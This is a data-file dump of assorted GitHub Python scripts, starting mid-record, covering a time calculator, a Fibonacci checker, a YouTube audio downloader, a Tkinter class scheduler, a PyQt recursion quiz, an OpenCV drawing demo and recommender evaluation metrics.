cal_nextday > 1:\n new_time = cal_time.time().strftime('%-I:%M %p') + \" (\" + str(cal_nextday) + \" days later)\"\n else:\n new_time = cal_time.time().strftime('%-I:%M %p')\n else:\n new_time = str(cal_time.time().strftime('%-I:%M %p')) + str_nextday\n\n return new_time","repo_name":"natthayasp/boilerplate-time-calculator-Public","sub_path":"time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20003935431","text":"def fib(x):\n a=x[0]\n b=x[1]\n for i in range(2,len(x)):\n if x[i]==(a+b):\n a=b\n b=x[i]\n else:\n return False\n return True\n\nn=int(input())\nx=list(map(int,input().split()))\nif len(x)<=2:\n print('no')\nelif fib(x):\n print('yes')\nelse:\n print('no')","repo_name":"Shavukarusasikumar/codemind-python","sub_path":"Fibonacci_array.py","file_name":"Fibonacci_array.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34601607969","text":"#!/usr/bin/env python\nimport re\n\narr = [1, 4, 8, 9, 7, 5]\n\ndef e_arr():\n for i, v in enumerate(arr):\n yield (i, v)\n\nfor i, v in e_arr():\n print(i, v)\n\nmatch = re.search('(?P.*)\\s+(?P.*)', 'paul 12345')\nname = match.group('name')\nphone = match.group('phone')\nprint(name, phone)\n\nm = re.findall('H', 'hHhHH')\nprint(len(m))\n","repo_name":"allred/allred","sub_path":"sketch/sketch.py","file_name":"sketch.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20433189483","text":"from __future__ import unicode_literals\nimport os\nimport os.path\n\nimport youtube_dl\n\nclass DownloaderAPI():\n DOWNLOAD_LOCATION = 'downloads/'\n available_videos = { }\n\n def __init__(self):\n self.ydl_opts = { # options for youtube_dl\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n 'outtmpl': self.DOWNLOAD_LOCATION + '%(id)s.%(ext)s'\n }\n\n # initiliaze the ydlObject\n self.ydl = youtube_dl.YoutubeDL(self.ydl_opts)\n self._populate_entries()\n\n def is_url_valid(self, url):\n try:\n # Get information about the YouTube video/song\n info = self.ydl.extract_info(url, download=False)\n return info['id']\n except:\n # The url does not exists or is wrong!\n return None\n\n def download(self, videoId, url):\n if videoId not in self.available_videos:\n try:\n self.ydl.download([url])\n except: # something went wrong at downloading process!\n raise\n\n filepath = os.path.join( self.DOWNLOAD_LOCATION, videoId + '.mp3' )\n self.available_videos[videoId] = filepath\n\n print(f'Saved video \"{videoId}\" @ \"{filepath}\"')\n else:\n print(f'Video \"{videoId}\" already downloaded!')\n\n def get_filepath(self, videoId):\n return self.available_videos[videoId]\n\n def _populate_entries(self):\n entries = { }\n for p in os.scandir(self.DOWNLOAD_LOCATION):\n if p.is_file():\n videoId = p.name.split('.')[0]\n entries[videoId] = os.path.realpath(p.path)\n\n self.available_videos = entries\n","repo_name":"kkanellis/genrec","sub_path":"web/server/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"14449429926","text":"#!/bin/python3\n\nimport sys\n\n\ndef arithmetic_progression_sum(a0, an, n):\n return (a0 + an) * n >> 1\n\n\ndef calc_sum(maximum, d):\n a0 = d\n\n if d > maximum:\n return 0\n n = maximum // d\n an = n * d\n\n if an == maximum:\n an -= d\n n -= 1\n\n return arithmetic_progression_sum(a0, an, n)\n\n\ndef calc_sum_slow(maximum, d):\n a = 0\n for x in range(d, maximum, d):\n a += x\n return a\n\n\ndef calc_sum_multiples_3_5(n):\n s1 = calc_sum(n, 3)\n s2 = calc_sum(n, 5)\n s3 = calc_sum(n, 15)\n return int(s1 + s2 - s3)\n\n\ndef main():\n t = int(input().strip())\n for a0 in range(t):\n n = int(input().strip())\n print(calc_sum_multiples_3_5(n))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mastergreg/hackerrank","sub_path":"eulerchallenge/euler_001.py","file_name":"euler_001.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"19626751790","text":"__author__ = \"alvaro barbeira\"\n\nimport re\nimport os\nimport pandas\n\nr_ = re.compile(\"(.*)_chr([0-9]+)_sb([0-9]+)_reg0.1_ff0.01_by_region.txt.gz\")\nr2_ = re.compile(\"gwas_parsing_(.*)_chr([0-9]+)_sb([0-9]+)_by_region.sh\")\n\n\ndef _r(path, r):\n files = os.listdir(path)\n results = []\n for f in files:\n s = r.search(f)\n results.append((s.group(1), s.group(2), s.group(3)))\n return results\n\ndef _p(results):\n results = pandas.DataFrame(data=results,columns= [\"trait\", \"chromosome\", \"sb\"])\n results[\"k\"] = results.chromosome + \"_\" + results.sb\n g = results[[\"trait\", \"k\"]].groupby(\"trait\").aggregate([\"count\"])\n g= g.reset_index(level=\"trait\", col_level=1)\n g.columns = g.columns.droplevel()\n g = g.sort_values(by=\"count\")\n return g\n\nresults = _r(\"results_summary_imputation\", r_)\nresults = _p(results)\n\njobs = _r(\"old/jobs_summary_imputation/\", r2_)\njobs = _p(jobs)\n#from import embed; embed()","repo_name":"hakyimlab/gtex-miscellaneous-processing","sub_path":"src/misc/_check.py","file_name":"_check.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"2941370429","text":"from tkinter import *\nimport tkinter.ttk as tk\nimport json\n\nBLACK = \"#1C2626\"\nWHITE = \"#FFFFFF\"\nRED = \"#FF0000\"\nPURPLE = \"#552D96\"\nGREEN = \"#00FF00\"\nGRAY = \"#C4C4C4\"\nFONT = \"Poppins\"\n\nclass ManageClass:\n def __init__(self, main_window):\n self.main_window = main_window\n self.search_text = StringVar()\n self.class_text = StringVar()\n self.course_text = StringVar()\n self.lec_text = StringVar()\n self.time_text = StringVar()\n self.search = \"\"\n self.class_name = \"\"\n self.course_name = \"\"\n self.lec_name = \"\"\n self.time_stamp = \"\"\n \n with open(\"../data/class_student.json\", mode=\"r\") as file:\n self.class_dict = json.load(file)\n\n # -------------------------------------------- add class function -------------------------------------------- #\n def callback_add_class(self, *args):\n self.class_name = str(self.class_text.get())\n self.course_name = str(self.course_text.get())\n self.lec_name = str(self.lec_text.get())\n self.time_stamp = str(self.time_text.get())\n\n def vcmd_add_class(self):\n self.class_text.trace_add(\"write\", callback=self.callback_add_class)\n self.course_text.trace_add(\"write\", callback=self.callback_add_class)\n self.lec_text.trace_add(\"write\", callback=self.callback_add_class)\n self.time_text.trace_add(\"write\", callback=self.callback_add_class)\n\n def add_new_schedule(self, *event):\n if len(self.class_name)<=0 or len(self.course_name)<=0 or len(self.lec_name)<=0 or len(self.time_stamp)<=0:\n self.indicator_label.configure(text=\"Please Enter the Field!\", fg=RED)\n return self.add_frame.after(1000, func=self.add_class_schedule)\n\n key_checker = [key for key in self.class_dict]\n if self.class_name in key_checker:\n self.indicator_label.configure(text=\"Class Already Exists!\", fg=RED)\n return self.add_frame.after(1000, func=self.add_class_schedule)\n \n data = {\n \"Subject\": str(self.course_name),\n \"StudentNIM\": [],\n \"Lecturer\": str(self.lec_name),\n \"Time\": str(self.time_stamp),\n \"Session\":{}\n }\n self.class_dict[f\"{self.class_name}\"] = data\n\n with open(\"../data/class_student.json\", mode=\"w\") as file:\n file.write(str(json.dumps(self.class_dict, indent=4, sort_keys=True)))\n\n self.indicator_label.configure(text=\"Class Added!\", fg=GREEN)\n self.add_frame.after(1000, func=self.manage_class)\n\n # -------------------------------------------- add class ui -------------------------------------------- #\n def add_class_schedule(self):\n # --------------- reset page\n for widget in self.main_window.winfo_children():\n widget.destroy()\n\n with open(\"../data/class_student.json\", mode=\"r\") as file:\n self.class_dict = json.load(file)\n \n self.add_frame = Frame(self.main_window, bg=BLACK)\n self.add_frame.grid(column=0, row=0)\n\n # --------------- label add schedule\n add_schedule_label = Label(self.add_frame, text=\"ADD CLASS SCHEDULE\", fg=WHITE, bg=BLACK, font=(FONT, 35, \"bold\"))\n add_schedule_label.grid(column=0, row=0, columnspan=3, pady=(0, 20))\n\n # --------------- class name label and entry\n class_name_label = Label(self.add_frame, text=\"Class Name\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n class_name_label.grid(column=1, row=1, sticky=\"W\")\n\n class_entry = Entry(self.add_frame, textvariable=self.class_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n class_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.class_text.set(\"\")\n class_entry.grid(column=1, row=2, pady=(0, 10), sticky=\"W\")\n\n # --------------- course name label and entry\n course_name_label = Label(self.add_frame, text=\"Course Name\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n course_name_label.grid(column=1, row=3, sticky=\"W\")\n\n course_name_entry = Entry(self.add_frame, textvariable=self.course_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n course_name_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.course_text.set(\"\")\n course_name_entry.grid(column=1, row=4, pady=(0, 10), sticky=\"W\")\n\n # --------------- lecturer name label and entry\n lec_name_label = Label(self.add_frame, text=\"Lecturer\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n lec_name_label.grid(column=1, row=5, sticky=\"W\")\n\n lec_name_entry = Entry(self.add_frame, textvariable=self.lec_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n lec_name_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.lec_text.set(\"\")\n lec_name_entry.grid(column=1, row=6, pady=(0, 10), sticky=\"W\")\n\n # --------------- time label and entry\n time_label = Label(self.add_frame, text=\"Time\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n time_label.grid(column=1, row=7, sticky=\"W\")\n\n time_entry = Entry(self.add_frame, textvariable=self.time_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n time_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.time_text.set(\"\")\n time_entry.grid(column=1, row=8, pady=(0, 10), sticky=\"W\")\n\n # --------------- indicator label\n self.indicator_label = Label(self.add_frame, text=\"\", fg=GREEN, bg=BLACK, font=(FONT, 12, \"bold\"))\n self.indicator_label.grid(column=1, row=9, pady=(50, 50))\n\n # --------------- cancel button\n cancel_button = Button(self.add_frame, text=\"Cancel\", command=self.manage_class, width=14, height=1)\n cancel_button.configure(background=BLACK, fg=WHITE, font=(FONT, 12, \"bold\"))\n cancel_button.grid(column=0, row=10, sticky=\"E\")\n\n # --------------- add new button\n add_new_button = Button(self.add_frame, text=\"Add New\", command=self.add_new_schedule, width=14, height=1)\n add_new_button.configure(background=PURPLE, fg=WHITE, font=(FONT, 12, \"bold\"))\n add_new_button.grid(column=2, row=10, sticky=\"W\")\n\n # --------------- add new enter\n self.main_window.bind(\"\", self.add_new_schedule)\n\n # -------------------------------------------- manage class function -------------------------------------------- #\n def callback_manage_class(self, *args):\n self.search = str(self.search_text.get())\n\n def vcmd_manage_class(self):\n self.search_text.trace_add(\"write\", callback=self.callback_manage_class)\n\n def click_search(self, *args):\n if str(self.search_text.get()) == \"Search...\":\n self.search_text.set(\"\")\n\n def leave_search(self, *args):\n if str(self.search_text.get()) == \"\":\n self.search_text.set(\"Search...\")\n\n def to_menu(self):\n from menu import Menu\n menu_page = Menu(self.main_window)\n menu_page.menu_page()\n\n def class_info(self, *event):\n try:\n select = self.schedule_table.focus()\n class_code = dict(self.schedule_table.item(select))\n class_code = class_code[\"values\"][0]\n\n from view_class_info import ViewClassInfo\n vci = ViewClassInfo(self.main_window, class_code)\n vci.view_class_info()\n except:\n return\n\n # -------------------------------------------- search class ui -------------------------------------------- #\n def search_class(self, *event):\n query = str(self.search)\n selections = []\n for child in self.schedule_table.get_children():\n item = self.schedule_table.item(child)[\"values\"]\n if query.lower() in item[0].lower() or query.lower() in item[1].lower() or query.lower() in item[2].lower():\n selections.append(child)\n\n self.schedule_table.selection_set(selections)\n try:\n self.schedule_table.see(str(selections[0]))\n except:\n pass\n\n # -------------------------------------------- manage class ui -------------------------------------------- #\n def manage_class(self):\n # --------------- reset page\n for widget in self.main_window.winfo_children():\n widget.destroy()\n \n manage_class_frame = Frame(self.main_window, bg=BLACK)\n manage_class_frame.grid(column=0, row=0)\n\n manage_class_label = Label(manage_class_frame, text=\"MANAGE CLASS SCHEDULE\", fg=WHITE, bg=BLACK, font=(FONT, 35, \"bold\"))\n manage_class_label.grid(column=0, row=0, padx=50, columnspan=2)\n\n # --------------- search\n search_bar = Entry(manage_class_frame, width=60, validate=\"focusin\", validatecommand=self.vcmd_manage_class, textvariable=self.search_text)\n self.search_text.set(\"Search...\")\n search_bar.bind(\"\", self.click_search)\n search_bar.bind(\"\", self.leave_search)\n search_bar.configure(background=GRAY, fg=BLACK, font=(FONT, 16))\n search_bar.grid(column=0, row=1, padx=10, pady=10, columnspan=2)\n\n self.main_window.bind(\"\", self.search_class)\n\n # --------------- table page\n table_style = tk.Style()\n table_style.configure(\"Treeview\", font=(\"Poppins\", 12), rowheight=30)\n table_style.configure(\"Treeview.Heading\", font=(\"Poppins\", 12, \"bold\"))\n\n scrollbar = Scrollbar(manage_class_frame, orient=\"vertical\")\n scrollbar.grid(column=1, row=2, sticky=\"NSE\", columnspan=2)\n\n self.schedule_table = tk.Treeview(manage_class_frame, yscrollcommand=scrollbar.set)\n self.schedule_table.grid(column=0, row=2, columnspan=2, sticky=\"W\")\n\n scrollbar.config(command=self.schedule_table.yview)\n\n self.schedule_table[\"columns\"] = (\"Class\", \"Course\", \"Time\")\n self.schedule_table.column(\"#0\", width=0, stretch=NO)\n self.schedule_table.column(\"Class\", anchor=CENTER, width=130, stretch=NO)\n self.schedule_table.column(\"Course\", anchor=CENTER, width=300, stretch=NO)\n self.schedule_table.column(\"Time\", anchor=CENTER, width=300, stretch=NO)\n\n self.schedule_table.heading(\"#0\", text=\"\", anchor=CENTER)\n self.schedule_table.heading(\"Class\", text=\"Class\", anchor=CENTER)\n self.schedule_table.heading(\"Course\", text=\"Course\", anchor=CENTER)\n self.schedule_table.heading(\"Time\", text=\"Time\", anchor=CENTER)\n\n self.main_window.bind(\"\", self.class_info)\n\n counter = 0\n for class_code in self.class_dict:\n subject = self.class_dict[class_code][\"Subject\"]\n time_stamp = self.class_dict[class_code][\"Time\"]\n self.schedule_table.insert(parent=\"\", index=\"end\", iid=counter, text=\"\", values=(f\"{class_code}\", f\"{subject}\", f\"{time_stamp}\"))\n counter += 1\n \n if len(self.class_dict) == 0:\n self.schedule_table.insert(parent=\"\", index=\"end\", iid=counter, text=\"\", values=(\"\", \"Please Enter Data to Continue\", \"\"))\n\n # --------------- back button\n back_button = Button(manage_class_frame, text=\"Back\", command=self.to_menu, width=14, height=1)\n back_button.configure(background=BLACK, fg=WHITE, font=(FONT, 12, \"bold\"))\n back_button.grid(column=0, row=3, pady=20, sticky=\"W\")\n\n # --------------- add class button\n add_class_button = Button(manage_class_frame, text=\"Add New\", command=self.add_class_schedule, width=14, height=1)\n add_class_button.configure(background=PURPLE, fg=WHITE, font=(FONT, 12, \"bold\"))\n add_class_button.grid(column=1, row=3, pady=20, sticky=\"E\")","repo_name":"jptriciaestella/face_card","sub_path":"ui/manage_class.py","file_name":"manage_class.py","file_ext":"py","file_size_in_byte":11728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8700768033","text":"#Coding:utf-8\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QLabel, QLineEdit, QPushButton\nfrom PyQt5.QtGui import QFont, QColor\nimport sys\nfrom random import choice\n\n\nclass MW(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setFixedSize(800, 600)\n # то, какие коэфециенты в шаблоне для рекурсии\n # [+-1, т.е. больше числа или меньше, когда есть рекурсия; чему кратно при проверке на рекурсию; чило, относительно которого всё происходит; слогаемое при нерекурсии; коэфициент при n^2 в формуле с рекурсией;\n # 5) коэфициент при n в формуле с рекурсией; слогаемое в формуле с рекурсией; коэфициент при рекурсии; слогаемое в рекурсии]\n self.variables = [1, 1, 10, 0, 0,\n 1, 1, 1, 1]\n # второй исход с рекурсивной формулой\n # [коэфициент при n^2 в формуле с рекурсией; коэфициент при n в формуле с рекурсией; слогаемое в формуле с рекурсией; коэфициент при рекурсии; слогаемое в рекурсии]\n self.variables2 = [0, 1, 1, 1, 1]\n self.whatcall = 10 # от чего вызываем\n self.answer = 0 # ответ на задачу\n # кнопка обновления\n self.updatebtn = QPushButton(self)\n self.updatebtn.clicked.connect(self.update)\n self.updatebtn.resize(50, 50)\n self.updatebtn.move(750, 550)\n self.updatebtn.setFont(QFont('Arial', 12))\n self.updatebtn.setText('ОБН')\n # лабел \"ответ\"\n self.anslab = QLabel(self)\n self.anslab.resize(150, 50)\n self.anslab.move(0, 550)\n self.anslab.setFont(QFont('Arial', 12))\n self.anslab.setText('ОТВЕТ:')\n # поле для ответа\n self.ansedit = QLineEdit(self)\n self.ansedit.resize(300, 50)\n self.ansedit.move(155, 550)\n self.ansedit.setFont(QFont('Arial', 12))\n # правильный ответ/нет лабел\n self.oklab = QLabel(self)\n self.oklab.resize(50, 50)\n self.oklab.move(460, 550)\n self.oklab.setFont(QFont('Arial', 12))\n self.oklab.setText('ДА')\n self.oklab.hide()\n # кнопка для проверки\n self.checkbtn = QPushButton(self)\n self.checkbtn.clicked.connect(self.checkAns)\n self.checkbtn.resize(150, 50)\n self.checkbtn.move(510, 550)\n self.checkbtn.setFont(QFont('Arial', 12))\n self.checkbtn.setText('ПРОВЕРИТЬ')\n # виджеты с условием на экране\n # [условие с =; возврвт с рекурсией; условие без =; возврат без рекурсии]\n self.tasklabs = []\n for i in range(7):\n self.tasklabs.append(QLabel(self))\n self.tasklabs[-1].resize(800, 50)\n self.tasklabs[-1].move(0, i * 55)\n self.tasklabs[-1].setFont(QFont('Ariel', 12))\n self.tasklabs[-1].show()\n \n def update(self):\n '''обновление задачи'''\n self.oklab.hide() # скрытие лабела\n # рандомизация коэфициентов\n self.variables = [choice([-1, 1]), choice([1, 2, 3]), choice(range(1, 25)), choice(range(-5, 5)), choice(range(-5, 5)),\n choice(range(-10, 5)), choice(range(-20, 20)), choice(list(range(-5, 0)) + list(range(1, 5))), choice(range(1, 5))]\n self.variables2 = [choice(range(-5, 5)), choice(range(-10, 5)), choice(range(-20, 20)), choice(list(range(-5, 0)) + list(range(1, 5))), choice(range(1, 5))]\n self.whatcall = choice(range(10, 500)) # рандомизация аргумента\n self.answer = self.getRec(self.whatcall)\n # заполняем лабел 0 (заголовок нерекурсии)\n s = 'При n <= ' + str(self.variables[2]) + ':' # просто строка для промежуточного хранения текста\n if self.variables[0] == -1:\n s = s.replace('<', '>')\n self.tasklabs[0].setText(s)\n # заполняем лабел 1 (формула нерекурсии)\n s = 'F(n) = n '\n if self.variables[3] < 0:\n s = s + '- ' + str(-1 * self.variables[3])\n elif self.variables[3] > 0:\n s = s + '+ ' + str(self.variables[3])\n self.tasklabs[1].setText(s)\n # заполняем лабел 2 (заголовок рекурсии)\n s = 'При n > ' + str(self.variables[2])\n if self.variables[0] == -1:\n s = s.replace('>', '<')\n if self.variables[1] != 1:\n s = s + ' и кратно ' + str(self.variables[1])\n s = s + ':'\n self.tasklabs[2].setText(s)\n # заполняем лабел 3 (формула рекурсии)\n s = 'F(n) = '\n if self.variables[7] == 1: # перед рекурсией\n s = s + 'F(n )'\n else:\n s = s + str(self.variables[7]) + 'F(n '\n if self.variables[0] == -1: # слогаемое в рекурсии\n s = s + '+ ' + str(self.variables[8]) + ') '\n else:\n s = s + '- ' + str(self.variables[8]) + ') '\n if self.variables[4] == 1: # n^2\n s = s + '+ ' + 'n^2 '\n elif self.variables[4] < 0:\n s = s + str(self.variables[4]) + 'n^2 '\n elif self.variables[4] > 0:\n s = s + '+' + str(self.variables[4]) + 'n^2 '\n if self.variables[5] == 1: # n\n s = s + '+ ' + 'n'\n elif self.variables[5] < 0:\n s = s + str(self.variables[5]) + 'n '\n elif self.variables[5] > 0:\n s = s + '+' + str(self.variables[5]) + 'n '\n if self.variables[6] < 0: # слогаемое\n s = s + str(self.variables[6])\n elif self.variables[6] > 0:\n s = s + '+' + str(self.variables[6])\n self.tasklabs[3].setText(s) # запись на лабел\n # лабелы 4 и 5 (доп строки для кратности)\n if self.variables[1] == 1:\n self.tasklabs[4].setText('Чему равно F(' + str(self.whatcall) + ')?')\n self.tasklabs[5].setText('')\n self.tasklabs[6].setText('')\n else:\n self.tasklabs[4].setText('Иначе:')\n s = 'F(n) = '\n if self.variables2[3] == 1: # перед рекурсией\n s = s + 'F(n )'\n else:\n s = s + str(self.variables2[3]) + 'F(n '\n if self.variables[0] == -1: # слогаемое в рекурсии\n s = s + '+ ' + str(self.variables2[4]) + ') '\n else:\n s = s + '- ' + str(self.variables2[4]) + ') '\n if self.variables2[0] == 1: # n^2\n s = s + '+ ' + 'n^2 '\n elif self.variables2[0] < 0:\n s = s + str(self.variables2[0]) + 'n^2 '\n elif self.variables2[0] > 0:\n s = s + '+' + str(self.variables2[0]) + 'n^2 '\n if self.variables2[1] == 1: # n\n s = s + '+ ' + 'n'\n elif self.variables2[0] < 0:\n s = s + str(self.variables2[0]) + 'n '\n elif self.variables2[0] > 0:\n s = s + '+' + str(self.variables2[0]) + 'n '\n if self.variables2[2] < 0: # слогаемое\n s = s + str(self.variables2[2])\n elif self.variables2[2] > 0:\n s = s + '+' + str(self.variables2[2])\n self.tasklabs[5].setText(s) # запись на лабел\n self.tasklabs[6].setText('Чему равно F(' + str(self.whatcall) + ')?')\n\n \n def getRec(self, whatcall):\n '''возвращает, что должно быть в результате рекурсии'''\n if self.variables[0] == 1 and whatcall <= self.variables[2] or\\\n self.variables[0] == -1 and whatcall >= self.variables[2]: # возвращается не рекурсия\n return whatcall + self.variables[3]\n elif (self.variables[0] == 1 and whatcall > self.variables[2] or\\\n self.variables[0] == -1 and whatcall < self.variables[2]) and whatcall % self.variables[1] == 0: # возвращается рекурсия при кратном\n return self.variables[7] * self.getRec(whatcall - self.variables[0] * self.variables[8]) + self.variables[4] * whatcall ** 2 +\\\n whatcall * self.variables[5] + self.variables[6]\n else: # возврвщает при некратном\n return self.variables2[3] * self.getRec(whatcall - self.variables[0] * self.variables2[4]) + self.variables2[0] * whatcall ** 2 +\\\n whatcall * self.variables2[1] + self.variables[2]\n\n def checkAns(self):\n try:\n ans = int(self.ansedit.text())\n self.oklab.show()\n if ans == self.answer:\n self.oklab.setText('ДА
')\n else:\n self.oklab.setText('НЕТ
')\n except:\n self.oklab.setText('ERR, ')\n print(self.answer)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n mw = MW()\n mw.show()\n sys.exit(app.exec_())\n ","repo_name":"Helegerd/recursia","sub_path":"recursia.py","file_name":"recursia.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13725327482","text":"import cv2 \nimport numpy as np\n\n# function to draw\ncount = 0\nx1 = 0\ny1 = 0\nx2 = 0\ny2 = 0\ndef draw(event, x, y, flags, param):\n global count, x1, y1, x2, y2\n if (event == cv2.EVENT_LBUTTONDOWN) and count == 0:\n x1 = x\n y1 = y\n count+=1\n elif (event == cv2.EVENT_LBUTTONDOWN) and count == 1:\n x2 = x\n y2 = y\n count = 0\n cv2.rectangle(img, pt1=(x1, y1), pt2=(x2, y2), color=(0,3,0), thickness=1)\n# else:\n# cv2.rectangle(img , pt1=(0,500), pt2=(500, 0), color=(0,0,0), thickness=-1)\n \n# connect to Callback function to draw\ncv2.namedWindow(winname = \"Title_bar\")\ncv2.setMouseCallback('Title_bar', draw)\n\n# image to show\n\nimg = np.zeros([500, 500, 3])\n\n# window operation\n\n\n# if we use \"and\" instead of \"&\" then the operation will not work because here we are doing bitwise and between \"cv2.waitKey(1)\"and\n# binary of 0xFF and checking whether the value of \"(cv2.waitKey(1) & 0xFF)\" is equal to ordinal value of q or say numeric value of \"q\"\n\n# https://stackoverflow.com/questions/35372700/whats-0xff-for-in-cv2-waitkey1\n# https://stackoverflow.com/questions/53357877/usage-of-ordq-and-0xff?rq=1\n\nwhile True:\n cv2.imshow('Title_bar', img)\n \n if (cv2.waitKey(1) & 0xFF) == ord('q'):\n break\n \ncv2.destroyAllWindows()","repo_name":"harshvardhan-anand/Artificial-Intelligence-Notes","sub_path":"ComputerVision/Notes/RectangleDrawWithMouse.py","file_name":"RectangleDrawWithMouse.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25849316364","text":"import torch\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torchvision.models import resnet18\nimport matplotlib.pyplot as plt\n\nmodel = resnet18(num_classes=2)\noptimizer = optim.SGD(params=model.parameters(), lr=0.05)\n\n# lr_scheduler.StepLR()\n# Assuming optimizer uses lr = 0.05 for all groups\n# lr = 0.05 if epoch < 30\n# lr = 0.005 if 30 <= epoch < 60\n# lr = 0.0005 if 60 <= epoch < 90\n\nscheduler = lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.1)\nplt.figure()\nx = list(range(100))\ny = []\nfor epoch in range(100):\n scheduler.step()\n lr = scheduler.get_lr()\n # print(epoch, scheduler.get_lr()[0]) # get_lr()\n y.append(scheduler.get_lr()[0])\nplt.plot(x, y)\nplt.savefig('lr_step.png')","repo_name":"PresageBoat/LRCurve","sub_path":"lr_curve/lr_step_curve.py","file_name":"lr_step_curve.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"43430623747","text":"import time\nfrom triangle import classify_triangle\n\n# examples taken from test_triangle.py\ntriangles = [\n # invalid\n (1, 2, 9), (1, 9, 2), (2, 1, 9), (2, 9, 1), (9, 1, 2), (9, 2, 1),\n (1, 1, -1), (1, -1, 1), (-1, 1, 1),\n # equilateral\n (1, 1, 1), (100, 100, 100), (99, 99, 99),\n # isosceles\n (100, 90, 90), (90, 100, 90), (90, 90, 100), (2, 2, 3),\n # scalene\n (5, 4, 3), (5, 3, 4), (4, 5, 3), (4, 3, 5), (3, 5, 4),\n]\n\n\nif __name__ == '__main__':\n # we don't really care about the output (we know the function work, from the test suite)\n # we just want to have something on which to measure running time\n\n for _ in range(3):\n for triangle in triangles:\n classify_triangle(*triangle)\n","repo_name":"bloa/magpie","sub_path":"examples/code/triangle-py_slow/run_triangle.py","file_name":"run_triangle.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"}
+{"seq_id":"16768992632","text":"#建立评价指标,评价模型\nimport numpy as np\nfrom users.recommend.myRecommend import *\n\n#召回率描述有多少比例的用户—物品评分记录包含在最终的推荐列表中,而准确率描述最终的推荐列表中有多少比例是发生过的用户—物品评分记录\n\ndef recall(trainset,testset,N,recommend,movie_matrix,user_matrix):\n all=0\n rec_list=0\n for user,movie in trainset.items():\n if user_matrix[user] in testset.keys():\n test_u=testset[user_matrix[user]]\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n if item in test_u:\n rec_list+=1\n all+=len(test_u)\n return rec_list/all\n\ndef precision(trainset,testset,N,recommend,movie_matrix,user_matrix):\n all=0\n rec_list=0\n # rs=recommendSys()\n for user,movie in trainset.items():\n if user_matrix[user] in testset.keys():\n test_u=testset[user_matrix[user]]\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n if item in test_u:\n rec_list+=1\n all+=N\n return rec_list/all\n\n\n#覆盖率表示最终的推荐列表中包含多大比例的物品\ndef coverage(trainset,testset,N,recommend,movie_matrix,user_matrix):\n allitems=set()\n coverageitems=set()\n for user,movie in trainset.items():\n for item in trainset[user].keys():\n allitems.add(item)\n\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n coverageitems.add(item)\n return len(coverageitems)/len(coverageitems)\n\n\n#新颖度:用推荐列表中物品的平均流行度度量推荐结果的新颖度,如果推荐出的物品都很热门,说明推荐的新颖度较低,否则说明推荐结果比较新颖。\ndef popularity(trainset,testset,N,recommend,movie_matrix,user_matrix):\n #得到流行表\n popularitems=dict()\n for user,movie in trainset.items():\n for item in movie.keys():\n if item not in popularitems:\n popularitems[item]=0\n popularitems[item]+=1\n res=0\n n=0\n for user,movie in trainset.items():\n train_u=recommend(user)\n\n train_id=[]\n\n for i in range(len(movie_matrix)):\n if movie_matrix[i] in train_u:\n train_id.append(i)\n\n for item in train_id:\n res+=np.log(1+popularitems[item])\n n+=1\n\n return res/n\n\n","repo_name":"iambajie/movie-recommend","sub_path":"users/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
